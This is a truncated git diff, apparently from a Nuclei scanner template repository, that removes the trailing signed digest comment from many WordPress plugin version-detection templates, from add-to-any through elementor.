0694ce0bf4..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ad3b3a0e09f9c8df8e4d7182b19d8a4f2d1a5c98275410586275bc5cb055d153022024ea7609535c3db5b0acb942f79c6a03c41f7729113b614f942b051302dc6812:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 0381db4b6d..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cea6afabd8a785f41040db23ab23537cdfac052444b3a29e71f3d451f3da35fb0220640016be59bf3f0458887004a71212d9c2b146e648f2067952b1274605a29ae1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 7ebda61950..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009bbfcf881ce6986d11134979b3a10119c0f46272243bf52f49479d43ed653278022031a72e4dab5002cc6a0686490edc5fe8120da682a131f2d44d1f052d1aefa653:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f071a3da9..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220709a4af0e03355f50baef84b992ac460de6c8ff2854312c2cb65182bcf9c17ca0220726d9a9362dccf2d9ee57c49c24ee2d4e0f921bdd4611962185a68dabe01cbcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 00e38ad6c1..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fe4cea615da0ffda9fc6b7c4bfe5ee5b19f1e313ea3792fd325b513610a9784b022020ad9f1388142e76050685ec797d7f5bfdee1e2edbadfa78248ed61eaf92072d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 9169535d1c..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204145de7639cc1b1225f4f30e0da6bf93542ccc82da81f64595c855ffea9c8a87022100e7580bac81bed25a8f4861b105cecd638766f5d5a802d10916c8b77cff991985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index cc62911c19..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ed66c4f82a8b1a7edcf387ed7b8a3dfd0ea437018b0d9ac5bfd06b38b37f097022047b564573c1e0f45513c07c9a0cb886e26d95f86958f17b8636c35814dc706b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 29f3c49dfd..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022071e9ba3276bb6ccee34bf80f78ff3171c59ed72e2863857e5a27cd5924b2e81202210088debec8e4cd634bd6c04c791dbee0722732b50fac5363099fd449c67718fad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 84cf6d5259..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050210f2739e84ab2315aec101a2b1b78a8460eaa55fa113c525502804293774802204c02f6cbe9912c96871b4a18ba870283f6c46d086e72b07f31e0baa5f1ac7572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index e5fbd7fbce..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7d7ca031d1771aabc8310dd91b4edbe5836fed4caf3e5a8846df5e45144364802202861f36e475b15f0a4dda3b3d8d431388d0d8d570b847c6d82c2e7409a3b795a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 9757d352b8..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220407b8270a888eab8d27d48c56469863d7c257b2c1e151a22c6b69f05946e14c4022100aba9488af54b37776840353735ae7e7434d96bf4f5ae7fd62f61a797a7a74d14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 37a39b50f1..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071102dd3ef8b9429c58bf1ff3d380bac7e423dddc74a7d5be96c8c8f9b950152022012985ee2d1b630b2c76f0415d272c017406a638539a26c254738a9f65d049aae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index ad45586645..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206c2735165c359a62362caa9dc2940856bd529681584d05b70f046b9aa38ac4b902204ffd5ced6808b59a8c62bcee226179a3a3cbb853f555dbefd4f8e1bf74e0394d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 0966778d1d..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100971f0e867db9fee6f82e8a9be2c8b11f025965ec0c40c4b254dcff50c6c1559302200d98519b412ce1e3f275592cbaf7bf50be10bf7994158d2550449b140cd1025f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 0f4dd37339..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203d9211a5d9755542f5e97ec2d5365fbb69045553c59d0215ad3088fef270ef0402200c48774e12ca64ab2fe4ffbc009488bb240ea029ec8c1e486612b4f6070dbeba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 40912e7bef..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207c9a642ded85e17fb8d4614fa3319499bfad496c9174d610f4c00ad20bceff46022100af0250c6674f9432b1db7b2c47250b0967ca24e4bf46a48be2a655904180f5cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 9f5ff70089..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f355efef4b0692c4a410999cf5c56273af728c685b077d903ddcd0a567c28555022004daf9c15c0344b0041158ac0127791fc33565296bbc9a9968387eda323b8382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 0fb2712213..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206fd6ac61652f09c38441af57e41332f1ef319ea9505fe7a6e25bb8b84c7300a2022100c6ea0c1bec0c9f30ae97e9e2f00bf5415d96e22083c66696a2d75a7233e41dfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 85f9d4dd41..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c0489e98cbee36f2d519ed2132aa4bdf98f6779595d172b48e0f58c4283256a40221008a1bb4e48bbf3b6f60f2e095145a9c42c76ab4973bdf60a56bdc8db93d143232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 484d05568e..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220726fdc56f174f32ce1f57633658bbbb931791c7aeeff5bc205ccdaf7236e66ca0221008d26077d5ab7cd4d7276f82370739051d062df947958aaf8eb9c74c5305381f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 1585a492a6..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202951798b98db029bf2c9ae44a87f6b104846f558f1ca3ce467630ae5ce8080c3022005255aae64b16cb658554563818968d3751bd18c2cbc87b8b297e54c098b270a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 9f9b0e9750..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022040b4fa74071dbd6ccf8e709389f82680c43519f722c0ed279c90f8bfe825e607022100c22c19b7fcfb1be4b95ae6024ea7b7c4da2b9ab630d1e841d12cf1bfa8dea02b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index fc411f0477..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a49d790cbae6e8ee9cbbc511cb99457aa63aa54a546beef376343201e8132af2022100b1404cc4f5ea88e0cb03746155108d46554a0db6b0c0c5852ff68ab7bfbaf086:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index cafa81c313..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a1a96984dd342fad97ce049269e20792b61b25180e8f4e523bd9285d2d89a8e0022027fbb8b5536766efed03d45243dc8613eb00077d835e83ed780389dc4cf1ee85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index f95a8118cc..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200a53804aff7c555d5171836d67825181371dfb00df4b3a87f8d54cace759b464022100df5e3683b2fbc48c5f293fe0cce80e61e1547500c6f7abb1307b7ac0afbb1010:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index adac927a5e..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bfb8cde8ae0528d69319be09881727465c5fe17857dc14cade66e6f0c2ba91c0022100fb020e823514e6fa1976896ae24ff31d5aa807561974bf03bb2c55573304fca0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index a4769c5d3b..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220322915d1f108443f4e019c02f11b6b5a24c9a7e19212bdbae9748d0f794ec59e022100b4d3fe5b326d5c4b90a4140fbca6cf9fa97ddef5ed33c9b87e60a02ea91e756d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d162c1b520..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d929ba60a2428f629953b79440c66120cc0bcc6e55f65923c83a2fdaea8f4a6022100e398b6cff4a889199b8327740746152abae170b0f1287dd318a1ad93bbb0d662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index ff73541d73..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205700ef9265108765eb6ef02305c6401b9f77d509d274c66613303aac2b0a3ff1022100e12f2fedbc18ba082c5dd06490dd29075322adda40c0372485d30fff5c3d2a65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 91d4bf2133..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ea22ab91bc487d3d8f3dcabf0473e6b439c7ae656b7b93df40b4e84ca01f8cec022054e04c83a65bc0a26e14717a788a738c16bca8424fa33e72050d29f7b2b91417:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index f317947689..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f6ccd9c980781936b5572b258ce57c70727457d2fa11148f7adb0d47809f78ce022100ca7a01cea79aa977f5e2b4d840b62a8baa7682331a329c57de081a553018070e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index e2a876e0a4..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ec24481b969b7fe79926434ce5997ee56735d0f324e9797e723f2be2684245902201a4eb35bf01842e25e438290d2439ea136e3af47013c07e67470617b46d189a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 8bddbbb2f3..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a520f8576ec2c087dcfc3d803870c50a06b9c747b006390a6d12c97da8ba6c9402201852665f83b31c97fad09b8f0ce3ea082f0519905ba189c65d0d739c8253a70a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index b533d8586b..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201aeafc2c156aa5c236c3a53f91cb30c96ec6af27c5645af68a60ef4589321f82022100cdf86fa7506d924657e2ae623c1ddba5b1cdd0c34d8d8403edf53f89d91d6607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5c3d306310..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200090009450403f6a5a9ccfaa5554b1d4f3b4c033f74843dfd7163c6b74554c99022100a9ce85bb652b19abef9b998e31002a2cd318ba173e1af7a52ac11f36ae67b730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index da690aff05..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b0643621521d09d1ddd33af33582bceb1cc4f3993ba987e11f94aee11c5b9a0a022019c2d80ba1e2fd3bd4ac5477df77d10a21c227ae9f83651e5a9f312b063169fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index e34d6eee96..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d32eea4909e812eeb6cbb21d6a7d775ccdcf4dba4ea353a05d9869981f96b60d022100d394ad44392227ff99a7455928b7bd49339575df062978eb92137ba7abf9c21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 5388d3fb87..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f266197e195711be19755b2333c27169c1bff48bd18844b72404f1c4e56780ec02201ade20f25fb874768c0ca7ed55c41da945270127af82098d42159266451eca89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 71630a2b8f..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220405e4a1e7aed40a6951a87cb55ad67b1ba5ff1b05d40b55d3b1fe9a8d9fdc076022061cec54bfca44a9d15499dd38cf7efa3f1b2f55f22aabe23a34f21506949fadd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index fddad02959..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220185c511b3ea86dbc15929f39e0acffa390f20547da5ba1a67280859d930ca1a302210087f4088b3d38bd3be7b72e7a5064ebb4d3ad40f005e63b9b0f907d0d65d27d3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a0b003c8a1..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f0a6c195ebb01da30f02273a7658ba98638bddcfce5416e721708e2c823506e7022100f69bdb41aab213e85154c6d1d8fd9c5419e7dc323438c51a6e7f569a3057dca3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 9ad02e3e48..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022057c3c6180869842efbca0f022730c41c022a25c13a7ac7c60aecf50d48e6cfb902206d2287e620ad689f4e1abc33501340d6f5172c1b40a6afafd9673a20703cae3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index e3d768d42a..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fbf4651f37d9c426fb34140b73514ac1f9581c7c0b37016c6400a9257d8a1cca022025635eb46f739b1002dee1686dda3585a0959af9c42c8f4a85e7fd334f4dc150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index cddc6ed08d..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ff471df4d02e6252c0df06c22f381c3b0caa74340f14e76cbf2fd32c950b546c02207a94e2b3e16614335ca466e85488033e09c8d317de342c98977aaa80e2a054e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 03bfd6ab66..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009f0cb09e0b36354a7135e113df10d72f46eb4cb2b7b1f1f3fd9ce0caf21fe240022100cca8ca9d1c038041afcdd2ce5f09e38ca199f1cfb537dc4e51edb423dc3fddb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 3d04f0008d..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203f80d8e9f31836ab45221eec9bcbea0ee6bfbc11d2f8cde5292c1534c091cc4d022027db193cc72b4151d6ec16749760ce79b30c324459e936df25c7aaf074580a8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index ee5b095b5e..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022046a7a42e09b7804352f7200f88880e1fff60984ebabb7786d561ffdb0309a329022100aa44403ddfcee52e3b6f17bb8367305894b3cb383b6d544603d033a932c14ecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 48076ff230..0db316d66d 100644 --- 